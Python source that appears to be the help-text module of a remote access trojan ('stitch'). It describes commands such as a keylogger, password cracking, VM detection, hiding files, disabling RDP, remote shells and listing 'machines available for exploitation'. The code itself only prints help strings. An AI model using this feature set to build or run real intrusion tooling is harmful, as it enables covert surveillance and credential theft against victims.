def st_help_keylogger():
    st_print(
        "[*] Records keystrokes of the user. Allowing you to view the status, start, stop, and dump the keystokes to screen."
    )
    usage_keylogger()
def st_help_touch():
    st_print('[*] Creates a file with no contents.')
    usage_touch()
def st_help_upload():
    st_print('[*] Uploads a file/dir to the system.')
    usage_upload()
def st_help_stitchgen():
    st_print('[*] Generates stitch payloads based on running OS.')
    usage_stitchgen()
def st_help_sudo():
    st_print("[*] Runs the preceding command with admin priveleges.")
    usage_sudo()
def st_help_shell():
    st_print('[*] Opens a shell prompt of the requested session.')
    usage_shell()
def st_help_ssh():
    st_print('[*] Attempts to open a ssh connection to the requested host.')
    usage_ssh()
def st_help_lsmod():
    st_print('[*] Displays list of all installed drivers.')
    usage_lsmod()
def st_help_listen():
    st_print('[*] Server binds to given port to listen for connections.')
    usage_listen()
def st_help_ls():
    st_print('[*] Displays a list of files and subdirectories in a directory.')
    usage_ls()
def usage_crackpassword():
    st_print('[*] Usage: crackpassword\n')
def st_help_logintext():
    st_print("[*] Sets the text of the system's login screen.")
    usage_logintext()
def st_help_lockscreen():
    st_print("[*] Enters the system's lock screen.")
    usage_lockscreen()
def st_help_location():
    st_print("[*] Gives public IP and estimate geo location of the system.")
    usage_location()
def st_help_screenshot():
    st_print('[*] Takes a screenshot of the screen.')
    usage_screenshot()
def st_help_more():
    st_print('[*] Displays ouput of file path.')
    usage_more()
def st_help_sessions():
    st_print('[*] Displays machines available for exploitation.')
    usage_sessions()
def st_help_popup():
    st_print("[*] Displays popup box with custom message.")
    usage_popup()
def st_help_showkey():
    st_print(
        '[*] Displays the active encrypted AES key used for payload creation.')
    usage_showkey()
def st_help_pwd():
    st_print('[*] Displays the name of the current directory.')
    usage_pwd()
def st_help_start():
    st_print('[*] Starts the desired file.')
    usage_start()
def st_help_pyexec():
    st_print('[*] Runs python script on the system.')
    usage_pyexec()
def usage_disableRDP():
    st_print('[*] Usage: disableRDP\n')
def st_help_ps():
    st_print('[*] Displays list of all running processes.')
    usage_ps()
def st_help_sysinfo():
    st_print('[*] Displays system information.')
    usage_sysinfo()
def st_help_scanreg():
    st_print('[*] Display information on Windows Registry.')
    usage_scanreg()
def st_help_unhide():
    st_print('[*] Unhides the specified file/dir from the user.')
    usage_unhide()
def usage_dir():
    st_print('[*] Usage: dir\n')
def st_help_vmscan():
    st_print('[*] Detects if the system is a virtual machine.')
    usage_vmscan()
def st_help_ipconfig():
    st_print("[*] Displays the system's IP configuration.")
    usage_ipconfig()